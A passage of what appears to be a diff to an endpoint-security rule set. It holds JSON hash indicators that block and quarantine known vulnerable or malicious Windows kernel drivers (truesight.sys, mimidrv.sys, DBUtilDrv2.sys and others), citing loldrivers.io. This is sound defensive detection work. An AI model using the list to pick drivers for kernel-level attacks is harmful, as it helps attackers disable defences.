+ "last_update": "2026-03-23T11:45:32.145603Z",
+ "creation_date": "2026-03-23T11:45:32.145605Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.145611Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "131e84e32dae6954247fc0699d5ba52bf2936b5a782c795ae9e708829a5c26d6",
+ "comment": "Vulnerable Kernel Driver (aka pxitrig64.sys) [https://www.loldrivers.io/drivers/c8619f49-8e23-489b-9878-53d27533da15/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fd9e94ab-a4de-5be6-a136-0ed10abcb1e1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.836451Z",
+ "creation_date": "2026-03-23T11:45:30.836453Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.836458Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "17a05f99826e8b1ebf223377dbcc8a007f4f22dddfad72058f040957485df030",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fda3e07d-75e3-5587-b3a5-0e8c31bbc0e3",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807822Z",
+ "creation_date": "2026-03-23T11:45:31.807825Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807834Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "168bb136f51bc4b442eb62e78fe0fe30972a6a833c38398e1a7a470fb8c91cd8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdb1ac33-8668-5ce9-85f0-bc01568e5e8a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612897Z",
+ "creation_date": "2026-03-23T11:45:29.612899Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612904Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "fd388cf1df06d419b14dedbeb24c6f4dff37bea26018775f09d56b3067f0de2c",
+ "comment": "Marvin Test Solutions HW vulnerable driver (aka Hw.sys and Hw64.sys) [https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdba7b11-9db5-57ee-89bf-bc6243d26a9c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.157240Z",
+ "creation_date": "2026-03-23T11:45:31.157242Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.157248Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c92e8c94f05926a0f324c85f809fd236ee6f99a83ccfa9c2bcd3dc4dc9e8c7b8",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdcf4eb2-3a8f-5204-9f16-1afce0834a21",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973484Z",
+ "creation_date": "2026-03-23T11:45:29.973486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973491Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0909005d625866ef8ccd8ae8af5745a469f4f70561b644d6e38b80bccb53eb06",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdd86998-51c5-5955-adf1-85747cf9dfc9",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823755Z",
+ "creation_date": "2026-03-23T11:45:30.823757Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823762Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c3a3c92951a3675d38186e33dd186c4df05214d1c7814b4e81201c043feb0c6e",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fddca3ea-f400-52b5-a7a2-ccea4335da76",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.150251Z",
+ "creation_date": "2026-03-23T11:45:31.150253Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.150259Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "679a104a53ca0707f98f46308069c5d3bbf625ef008e75b2c01993dee6e54cb7",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fddecbd7-a621-5813-a01c-14e7fffa138f",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479548Z",
+ "creation_date": "2026-03-23T11:45:30.479550Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479555Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "29d765e29d2f06eb511ee88b2e514c9df1a9020a768ddd3d2278d9045e9cdb4a",
+ "comment": "Malicious Kernel Driver (aka e939448b28a4edc81f1f974cebf6e7d2.sys) [https://www.loldrivers.io/drivers/4f2edf45-b135-404f-bedc-9583f0bae574/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fde3043b-6bf5-5510-b834-d627dfa375ae",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983738Z",
+ "creation_date": "2026-03-23T11:45:29.983740Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983745Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "d3d601c77d4bb367ab3105920ca8435aa775448a49c1eda6ac6f46ee5d8709cb",
+ "comment": "Vulnerable Kernel Driver (aka AsrAutoChkUpdDrv.sys) [https://www.loldrivers.io/drivers/b72f7335-6f27-42c5-85f5-ed7eb9016eac/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fde5dd99-4ef2-5dc6-ab7d-395aeffb899c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.148962Z",
+ "creation_date": "2026-03-23T11:45:31.148964Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.148970Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "f060130fad8cc5f7ca388801f6d42a3cae26e19841aad9e5d944e79e6f7e288d",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fde666b5-832d-5130-b6fa-10651df90bc6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.809569Z",
+ "creation_date": "2026-03-23T11:45:31.809572Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.809580Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c13eff9d6aeb9458902878207e6224d0f31f30d05fd83aa654add43219a33084",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdeb7371-86a2-515c-92f8-ce7608e295f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.808576Z",
+ "creation_date": "2026-03-23T11:45:31.808579Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.808584Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e5edc5325e00f7aa95e4f6f698962f86d9378ff8c3604c52b6bf6d354a75f155",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdf439b8-c973-560b-99f3-f71dafc19335",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.465368Z",
+ "creation_date": "2026-03-23T11:45:30.465372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.465381Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "51805bb537befaac8ce28f2221624cb4d9cefdc0260bc1afd5e0bc97bf1f9f93",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fdf9b4e3-740a-5d28-83f9-fe7a1ec72a0c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.479206Z",
+ "creation_date": "2026-03-23T11:45:31.479209Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.479220Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c621ad6afe87288d22cc0f34671d45715b92ef31d7d39fd79188a706b9da12f2",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe035dec-a880-51c1-873b-f05d2505befc",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.826233Z",
+ "creation_date": "2026-03-23T11:45:31.826235Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.826241Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "775084db4927dc7a387096c4ce6adf7720d56520700c55d0ca373a16ee7c654a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe0c8695-8153-5452-bbcc-008544e11cfa",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.814287Z",
+ "creation_date": "2026-03-23T11:45:31.814290Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.814299Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "6d8975092b4a8b643af5bd04fd5973e74607ad44fa274ad0d12d8051228db039",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe0e7ebe-fe57-5e8c-b036-0dc9a25c7417",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.474005Z",
+ "creation_date": "2026-03-23T11:45:30.474008Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.474017Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "88671ef30520d11a63a4cb3acf6b1c827c82acced657baa8f371034957ddf825",
+ "comment": "Vulnerable Kernel Driver (aka cpuz.sys) [https://www.loldrivers.io/drivers/0f59ce3b-20ac-41ba-8010-2abc74827eb8/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe0fe43b-69b1-58d6-bcce-ed2452f59aaf",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827561Z",
+ "creation_date": "2026-03-23T11:45:30.827563Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827568Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "854ed66189aafb979aaafc60d03a58e5b96e08c6345183bfc06ac27dbb832053",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe1a336f-5f83-5860-be4b-9fb4dd26d57d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143042Z",
+ "creation_date": "2026-03-23T11:45:31.143044Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143049Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "2a83762324a1e0d224566b083cd808f582c4e04bc99e02b6e418bda23a12db25",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe20c382-5062-50a5-91b5-6570ab004878",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.617643Z",
+ "creation_date": "2026-03-23T11:45:29.617645Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.617651Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c9b8ecd0657fda14476920fe47783bd8a951d7a4a640935d9199b4a7ae4b8b69",
+ "comment": "ATI Technologies vulnerable GPU flash tool (aka atillk64.sys) [CVE-2020-12138] [https://www.loldrivers.io/drivers/61514cbd-6f34-4a3e-a022-9ecbccc16feb/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe236022-89b6-54e2-b97d-17b3a3c238c6",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.983299Z",
+ "creation_date": "2026-03-23T11:45:29.983301Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.983306Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "462cd6db3c0be714dd751466d5871c111812faf392c468c81a88cb0da4783458",
+ "comment": "Vulnerable Kernel Driver (aka DBUtilDrv2.sys) [https://www.loldrivers.io/drivers/bb808089-5857-4df2-8998-753a7106cb44/,https://www.rapid7.com/blog/post/2021/12/13/driver-based-attacks-past-and-present/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "fe251034-4ba0-5d27-80b0-ad8dfa72eab1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.610300Z",
+ "creation_date": "2026-03-23T11:45:29.610302Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
